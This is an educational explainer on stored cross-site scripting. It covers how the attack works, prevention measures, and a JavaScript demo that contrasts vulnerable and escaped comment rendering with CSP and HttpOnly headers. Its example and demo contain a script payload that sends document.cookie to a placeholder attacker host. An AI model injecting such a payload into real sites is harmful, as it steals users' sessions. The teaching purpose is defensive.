Stored XSS

Stored Cross-Site Scripting (XSS), also known as Persistent XSS, occurs when a malicious script is permanently stored on the target server (for example in a database, message forum, comment field, or visitor log) and is later served to every user who views the affected content.

How It Works

Unlike reflected XSS, the attacker doesn't need to trick victims into clicking a link. The malicious payload is stored on the server and automatically executed when any user views the page containing the stored data. This makes stored XSS particularly dangerous as it can affect many users.

Example

A vulnerable comment system that stores and displays user comments:

POST /comment
Body: comment=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

Later, when any user views the comments, the stored payload is served as part of the page:

<div class="comment">
  <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
</div>

Prevention

  • Sanitize and encode all user input before storage
  • Encode output when rendering stored content
  • Implement Content Security Policy (CSP)
  • Use HttpOnly flag on sensitive cookies
  • Consider using HTML sanitization libraries for rich text
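The comment system above, as an added example that is not part of the original page: a minimal in-memory comment store with the vulnerable render beside the hardened one, plus the CSP and HttpOnly cookie headers the prevention list recommends. The functions, the sample comments and the hostname attacker.example are constructed for this illustration.

```javascript
// Added example (not from the original page): a minimal comment store that
// shows the vulnerable render path beside the hardened one.
// Sample comments are constructed; 'attacker.example' is a placeholder host.

const comments = []; // stands in for the database table holding comments

// Stores the comment exactly as submitted. Raw storage is acceptable only if
// every render path encodes the text; the defect is in renderCommentUnsafe.
function storeComment(text) {
  comments.push(text);
  return comments.length;
}

// VULNERABLE: interpolates stored text straight into HTML, so a stored
// <script> tag is delivered to every visitor who loads the comment list.
function renderCommentUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// Output encoding for the HTML text context: the five characters that can
// change meaning in an HTML body are replaced by entity references.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// HARDENED: same markup, but the stored text is encoded at render time so the
// browser treats it as text rather than markup.
function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// Defence in depth: a CSP that only allows scripts from the site's own origin
// (inline <script> blocks are refused), and an HttpOnly session cookie that
// document.cookie cannot read even if a script does run.
function securityHeaders(sessionId) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'Set-Cookie': `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Renders the full comment list with the given render function.
function renderAll(render) {
  return comments.map(render).join('\n');
}

// Demo: a benign comment followed by the payload from the example above.
const payload =
  "<script>fetch('https://attacker.example/steal?c='+document.cookie)</script>";
storeComment('First post!');
storeComment(payload);
console.log('--- vulnerable render ---\n' + renderAll(renderCommentUnsafe));
console.log('--- hardened render ---\n' + renderAll(renderCommentSafe));
```

Encoding at render time is the control that actually decides whether the browser sees markup or text; encoding before storage helps only if every consumer of the stored value expects HTML, so treat output encoding as mandatory and input sanitization as an extra layer. The CSP and HttpOnly headers limit the damage when an encoding gap is missed: the inline script is blocked by the policy, and the session cookie is out of reach of document.cookie.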
